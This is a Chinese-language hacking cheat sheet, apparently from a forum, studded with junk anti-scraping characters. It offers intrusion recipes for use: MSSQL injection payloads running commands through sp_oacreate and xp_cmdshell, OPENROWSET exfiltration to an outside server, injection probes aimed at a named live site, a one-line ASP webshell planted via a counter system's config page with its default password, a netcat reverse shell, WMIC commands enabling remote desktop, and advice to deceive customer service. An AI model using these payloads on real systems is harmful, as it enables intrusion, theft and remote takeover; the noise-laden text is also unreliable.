SA点数据库分离技术相关
8 A6 n, B; ~# }* K3 A$ s# {6 O" f% e) M
; \3 Y% T: I, h
SA点数据库分离搞法+语句:1 v: S% E4 F& d* _
& P0 B# [) b1 p
注射点不显错,执行下面三条语句页面都返回正常。 Z# W1 ]8 R$ U: q+ Q! s
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')" s, Q! ]/ E7 M+ `7 a
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
& T( n* @5 d( Pand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')- ]9 k$ h5 U( @+ T$ ^
可以列目录,判断系统为2000,web与数据库分离+ U9 J5 v D) w" ]3 w
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。( Q' T) w" a1 {( h! y
在注射点上执行
& J2 r/ u/ p' ]8 C, q8 ^declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
6 G5 F- L, I5 @. E2 P页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP4 v( `% q- N1 |' s) p, |0 d
还有我用NC监听得其他端口都没有得到IP。2 j& ^" h" T; g; J7 f, L J1 D
; V8 h- Q+ [; N, R$ |7 F# `
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
- L! Q0 ]5 N' o'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--7 x5 ?/ [% p9 i2 {; z4 N
6 N9 r* x, ^7 k- v! `
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--8 H# v( L1 k, D; ^& d
% ] e% B. l3 J4 z1 ^+ i# K+ n0 ]现在就猜想是不是数据库是内网而且不能连外网。* f3 n$ i9 M; W2 |
9 |' R# P' A) i5 x8 G4 S$ I+ x9 c9 ~4 G! G! I# u4 B( h
access导出txt文本代码- e2 c% W+ @0 D' \
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin% ?1 Q7 F+ b/ k% }8 S8 Z+ A
0 y* L o$ x6 d, y1 {. F | Z* a2 Z9 e5 m! L9 x6 n
& j- l* z. E Q+ \
自动跳转到指定网站代码头
, P; U! f& R& t2 W* {5 Q<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>; k* T5 w5 Z. ?2 w/ c3 p) [5 I1 T
8 W" S1 r$ L& A+ m
7 T! c" S" u( C4 L6 v n/ W. {, n
入侵java or jsp站点时默认配置文件路径:
- N1 k: ]- I% f2 J3 K6 u, v0 l7 r\web-inf\web.xml
# O5 c# M+ T5 n1 `( l" ktomcat下的配置文件位置:
( v( ~$ D& {+ I$ ~4 v\conf\server.xml (前面加上tomcat路径)
4 ?3 r/ i- s* P7 `+ ]8 C8 N\Tomcat 5.0\webapps\root\web-inf\struts-config.xml3 }. C* _* C& j+ d! }+ r
* f; J- W, b( P( t) g( |0 g! V- K3 d9 r: g6 e/ f
: s" y, ?1 t; C检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
$ i& y: I' t6 @' {-1%23- Y7 w7 ?% l: p$ T+ c( k
> $ H" z3 X( X, O+ Z) S
<
; ^# A. ~8 A! l6 C$ t* u. ^# k1'+or+'1'='19 ?' u) _, D0 W5 y- `
id=8%bf
8 q4 q# h8 \- z
; _: y8 ], q; y% h0 q全新注入点检测试法:
8 Y1 d# {# b+ {3 Z9 K4 {. y0 U1 e在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。! |+ S" L* Y+ D7 i; r
" S, y* j' F2 g- Z, u
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。" d: ], W: d b
; @; q0 i' F4 J. G) F+ \- _搜索型注入判断方法:
, Z8 D8 r8 N7 D2 j! a, |北京%' and '1'='1' and '%'='
/ e9 ~1 z# m2 L3 A% W' E北京%' and '1'='2' and '%'='
6 _6 c0 B9 F- W1 z+ _9 `! I2 _1 P8 Q- ]+ b0 \
2 W0 E. H. j5 n- h2 M kCOOKIES注入:
/ A8 _+ B6 T) B4 N5 q9 X3 C9 D- i1 a; K( L6 ~2 g: y( i
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
+ H( c- o/ Q/ E6 F
2 E% h7 Q9 x1 _( {2000专业版查看本地登录用户命令:% _: U& h) Z; e9 |7 l* H
net config workstation; _; S# G$ d4 X+ K+ J. F, q8 H
7 W- K) X* ]5 e4 j3 a9 r0 ~8 V5 h, e! u* z' a
2003下查看ipsec配置和默认防火墙配置命令:8 O4 o$ ]; H5 C2 ^) b2 }
netsh firewall show config
$ H# d! @: c& a; Lnetsh ipsec static show all! w( X* Q! ?0 H1 t& j U& F
6 d% E! P- g) n" s& [& v不指派指定策略命令:
" o' u- l6 D% x, U: ~netsh ipsec static set policy name=test assign=n (test是不指派的策略名)0 W2 w1 b4 K& I5 T# D9 B6 v! k
netsh ipsec static show policy all 显示策略名
: C n: Q4 M! M% [& o
$ N1 H) |( v4 z& h3 s! ~" U( D' ^/ Z- p; U( g% V
猜管理员后台小技巧:) k3 p1 S( [5 p y& k1 ~
admin/left.asp
5 l8 i6 Q( c6 Y( S, g" p+ H2 fadmin/main.asp
5 D0 m. \+ | N" h: yadmin/top.asp
" v6 n! I* c E% t" J2 B" d9 wadmin/admin.asp
4 B; m" i' Y1 A& Z8 n会现出菜单导航,然后迅雷下载全部链接, r& s) j. l3 @' ` \
. x+ ]" _# c8 U. o& K9 p) B8 p$ q. u4 E: l: p% f
社会工程学:
/ P: v9 ?( V2 d. m( S! O/ d用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人) R) j( x8 E, g4 I3 _
然后去骗客服
% n3 C/ b0 S- I, O
' l, P; o5 ~' [% @- Q( m9 G4 ~8 b# w1 z( @, W: Z% Z
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
6 O; W d G( e+ j5 X8 `) H7 N查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
, f; L/ Q6 }+ O$ y V. P 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
) n# n0 E5 g5 V2 i0 s( g; e' V
0 b2 w. ~! v B1 F7 Q
$ g6 X# D1 m$ k% {2 _9 e0 l+ V- U7 {; [# i s7 Q; @
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)1 L) e- P5 f" v
3 \. m" h7 X6 K4 O- V: O" ~
! B. ^- }* K( o9 i2 _3 P
4 K$ b a. C. F. @. W/ Y8 {) h
CMD加密注册表位置0 u. S0 A# E3 S2 K% i/ j
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor1 i& F1 h0 U5 O: h; i
AutoRun* ]4 t7 r& W5 ]* P5 Z5 P Y5 S
4 b" K- V `. q5 q4 U! `
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor; G# k0 \/ V" A$ z; b
AutoRun# Y* {0 e9 D2 ]1 a
; g. n" c* Q8 L: F# D
* w- P* a4 T" d0 U5 G在找注入时搜索Hidden,把他改成test4 \# {7 g9 M0 Q) r$ _- t5 Q6 ]8 m
+ ]2 C- B! H0 }8 A
9 M8 W* Q; L) W8 H: `7 z) a6 z
! F; D9 ~& W e B7 _* Y. {mstsc /v:IP /console
1 w+ b' t) p5 i, a' e. h, A# z9 l; ?, a6 ?: n" ~/ K+ \$ [ o
5 s) \1 u8 H1 W" d0 h一句话开3389:, X1 E, i1 L" F& b' C6 Q: ^& A
! Z1 Y! j4 i7 k$ y7 J
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> & ^7 s1 G+ ]" o/ o
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
- |- k7 W4 I2 z0 K7 q `: Y' B; c' \. m$ V) G
, T5 m& p8 L9 _( D3 E6 B. x$ U; ~知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
$ B7 Y2 M& r2 lInsert into admin(user,pwd) values('test','test')0 } G* ?2 w6 |- @
$ D' S2 |9 k- o
! f9 t; i. @) J9 {8 {! U4 `NC反弹1 [1 r9 h, X& N: {
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
. P4 [3 o2 ?' ~8 I/ |; U然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行). {# {6 W# s& y
* R3 d9 y* t$ J4 {
- v5 R7 w: `* M/ k
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
5 G" E! J* F1 L! J# N+ h4 E( k% A+ c% N
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录 L8 a* q P. E% J
例如:# P. O/ O& f J* L. o4 F
subst k: d:\www\ 用d盘www目录替代k盘
+ ~) I; R7 _3 m" G L d1 Zsubst k: /d 解除K盘代替 |